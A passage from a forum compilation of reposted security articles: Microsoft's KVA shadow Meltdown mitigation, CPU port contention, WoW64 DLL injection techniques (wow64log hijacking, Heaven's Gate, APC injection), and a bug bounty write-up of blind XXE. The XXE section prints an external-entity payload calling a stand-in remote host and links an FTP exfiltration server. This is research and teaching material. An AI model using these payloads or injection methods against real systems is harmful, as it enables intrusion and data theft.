stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as any updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory page if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge-cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel, because processors susceptible to rogue data cache load cannot observe any cached virtual address translations for any privileged kernel pages that could contain sensitive memory contents while in user mode, for KVA shadow protections to be effective, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch. Booting is just the beginning of a journey At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow. However, there’s much more that’s involved beyond just trap handling and memory management: For example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the basics of the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load. Performance optimizations One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory. Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer, (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done so, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost. PCID acceleration The first optimization, the usage of PCID (process-context identifier) acceleration is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, and which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached the processor’s TB; then, on address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires that the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces. This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). User/global acceleration Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations including global translations is provided by the processor, for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global. Privileged process acceleration The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications. Optimizations are ongoing The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort. Driver and application compatibility A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure. Conclusion Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities. Ken Johnson, Microsoft Security Response Center (MSRC) Sursa: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
-
Understanding CPU port contention. 21 Mar 2018 I continue writing about performance of the processors and today I want to show some examples of issues that can arise in the CPU backend. In particular today’s topic will be CPU ports contention. Modern processors have multiple execution units. For example, in SandyBridge family there are 6 execution ports: Ports 0,1,5 are for arithmetic and logic operations (ALU). Ports 2,3 are for memory reads. Port 4 is for memory write. Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, will present easy to understand pipeline diagramms and even try IACA. It will be very interesting, so keep on reading! Disclaimer: I don’t want to describe some nuances of IvyBridge achitecture, but rather to show how port contention might look in practice. Utilizing full capacity of the load instructions In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at first example where I will read one cache line (64 in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make reads within one cache-line in order to eliminate cache effects. I will repeat this 1000 times: max load capacity ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] dec edi jnz .loop I think there will be no issue with loading values in the same eax register, because CPU will use register renaming for solving this write-after-write dependency. Performance counters that I use UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X. UOPS_EXECUTED.STALL_CYCLES - Counts number of cycles no uops were dispatched to be executed on this thread. UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops was executed per-thread. Full list of performance counters for IvyBridge can be found here. Results I did my experiments on IvyBridge CPU using uarch-bench tool. Benchmark Cycles UOPS.PORT2 UOPS.PORT3 UOPS.PORT5 max load capacity 8.02 8.00 8.00 1.00 We can see that our 16 loads were scheduled equally between PORT2 and PORT3, each port takes 8 uops. PORT5 takes MacroFused uop appeared from dec and jnz instruction. The same picture can be observed if use IACA tool (good explanation how to use IACA): Architecture - IVB Throughput Analysis Report -------------------------- Block Throughput: 8.00 Cycles Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA Port Binding In Cycles Per Iteration: ------------------------------------------------------------------------- | Port | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | ------------------------------------------------------------------------- | Cycles | 0.0 0.0 | 0.0 | 8.0 8.0 | 8.0 8.0 | 0.0 | 1.0 | ------------------------------------------------------------------------- N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0) D - Data fetch pipe (on ports 2 and 3), CP - on a critical path F - Macro Fusion with the previous instruction occurred | Num Of | Ports pressure in cycles | | | Uops | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | | --------------------------------------------------------------------- | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x4] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x8] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0xc] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x10] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x14] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x18] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x1c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x20] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x24] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x28] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x2c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x30] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x34] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x38] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x3c] | 1 | | | | | | 1.0 | | dec rdi | 0F | | | | | | | | jnz 0xffffffffffffffbe Total Num Of Uops: 17 Why we have 8 cycles per iteration? On modern x86 processors load instruction takes at least 4 cycles to execute even the data is in the L1-cache. Although according to Agner’s instruction_tables.pdf it has 2 cycles latency. Even if we would have latency of 2 cycles we would have (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles. According to this calculations we should receive 16 cycles per iteration. But we are running at 8 cycles per iteration. Why this happens? Well, like most of execution units, load units are also pipelined, meaning that we can start second load while first load is in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on. This is simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages: F(fetch) D(decode) I(issue) E(execute) or M(memory operation) W(write back) It is far from real execution diagram of my CPU, however, I preserved some important constraints for IvyBridge architecture (IVB): IVB front-end fetches 16B block of instructions in a 16B aligned window in 1 cycle. IVB has 4 decoders, each of them can decode instructions that consist at least of a single uop. IVB has 2 pipelined units for doing load operations. Just to simplify the diagrams I assume load operation takes 2 cycles. M1 and M2 stage reflect that in the diagram. It just need to be said that I omitted one important constraint. Instructions always retire in program order, in my later diagrams it’s broken (I simply forgot about it when I was making those diagrams). Drawing such kind of diagrams usually helps me to understand what is going on inside the processor and finding different sorts of hazards. Some explanations for this pipeline diagram In first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B aligned window as first 4 loads. In second cycle we were able to decode all 4 fetched instructions, because they all are single-uop instructions. In third cycle we were able to issue only first 2 loads. One of such load goes to PORT2, the second goes to PORT3. Notice, that LOAD3 and LOAD4 are stalled (typically waiting in Reservation Station). Only in cycle #4 we were able to issue LOAD3 and LOAD4, because we know M1 stages will be free to use in next cycle. Continuing this diagram further we could see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration. I made additional experiment to prove this theory. I collected some more performance counters: Benchmark Cycles CYCLES_GE_3_UOP_EXEC CYCLES_GE_2_UOP_EXEC CYCLES_GE_1_UOP_EXEC max load capacity 8.02 1.00 8.00 8.00 Results above show that in each of 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (last 2 loads + dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling it in parrallel with 2 loads. What is even more interesting is that if we do simulation with assumption that load instruction takes 4 cycles latency, all the conclusions in this example will be still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions each cycle. And that would mean that our 16 loads (inside each iteration) will retire in 8 cycles. Utilizing other available ports in parallel In the example that I presented, I’m only utilizing PORT2 and PORT3. And partailly PORT 5. What does that mean? Well, it means that we can schedule instructions on another ports in parrallel with loads just for free. Let’s try to write such an example. I added after each pair of loads one bswap instruction. This instruction reverses the byte order of a register. It is very helpful for doing big-endian to little-endian conversion and vice-versa. There is nothing special about this instruction, I just chose it because it suites best to my experiments. According to Agner’s instruction_tables.pdf bswap instruction on a 32-bit register is executed on PORT1 and has 1 cycle latency. max load capacity + 1 bswap ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx dec edi jnz .loop Here are the results for such experiment: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 max load capacity + 1 bswap 8.03 8.00 8.01 8.01 1.00 First observation is that we get 8 more bswap instructions just for free (we are running still at 8 cycles per iteration), because they do not contend with load instructions. Let’s look at the pipeline diagram for this case: We can see that all bswap instructions nicely fit into the pipeline causing no hazards. Overutilizing ports Modern compilers will try to schedule instructions for particular target architecture to fully utilize all execution ports. But what happens when we try to schedule too much instruction for some execution port? Let’s see. I added one more bswap instruction after each pair of loads: port 1 throughput bottleneck ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx bswap ecx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx bswap ecx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx bswap ecx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx bswap ecx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx bswap ecx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx bswap ecx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx bswap ecx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx bswap ecx dec edi jnz .loop When I measured result using uarch-bench tool here is what I received: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 port 1 throughput bottleneck 16.00 16.00 8.01 8.01 1.00 To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again: Now it’s clear to see that we have 16 bswap instructions and only one port that can handle this kind of instructions. So, we can’t go faster than 16 cycles in this case, because IVB processor executes them sequentially. Different architectures might have more ports to handle bswap instructions which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know limitations of your hardware! Additional resources More detailed information about execution ports of your processor can be found in Agner’s microarchitecture.pdf and for Intel processors in Intel’s optimization manual. All the assembly examples that I showed in this article are available on my github. UPD 23.03.2018 Several people mentioned that load instructions can’t have 2 cycles latency on modern Intel Architectures. Agner’s tables seems to be not accurate there. I will not redo the diagrams as it will be difficult to understand them, and they will shift the focus from the actual thing I wanted to explain. Again, I didn’t want to reconstruct how the pipeline diagram will look in reality, but rather to explain the notion of port contention. However, I totally accept the comment and it should mentioned. But also if we assume that load instruction takes 4 cycles latency in those examples, all the conclusions in the post are still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in HackerNews comments. Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
-
DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32. Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll The main advantage of this method lies in its sheer simplicity – All it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method: First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc. Heaven’s Gate More control over the injection process can be achieved by simply issuing the call to LdrLoadDll()ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages: Gain the ability to execute arbitrary 32-bit code inside the target process. Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments. Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification: Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure: The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process so using LoadLibrary() and its variants is not possible. The path to the DLL we wish to load into the process. Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments: Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A ). Albeit promising, when attempting to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error. Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle. Appendixes Appendix A – complete source code for APC injection with adapter thunk Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
-
Posted on March 24, 2018 by tghawkins Today, I’d like to share my methodology behind how I found a blind, out of band xml external entities attack in a private bug bounty program. I have redacted the necessary information to hide the program’s identity. As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page: I noticed in the response, the xml content-type along with an xml body containing XML SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200. Since the web application seemed to be responding well to the POST request, instead of the issuing a 405 Method Not Allowed error, I decided to issue a request containing xml syntax with the content-type: application/xml. The resulting response was also different than in the previous cases. This response was also in XML as it was when issuing the GET request to this endpoint. However this time, within the tags is the value “OK” instead of the original value “TestRequestCalled”. I also tried to send a json request to see how the application would respond. Below is the result. Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to an set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the dtd being successfully processed, with the requested file contents appended. I also used this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb to set up, and have an ftp server listening so I would also be able to extract the server’s information/file contents through the ftp protocol: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue. Some helpful XXE payloads: -------------------------------------------------------------- Vanilla, used to verify outbound xxe or blind xxe -------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> ]> <r>&sp;</r> 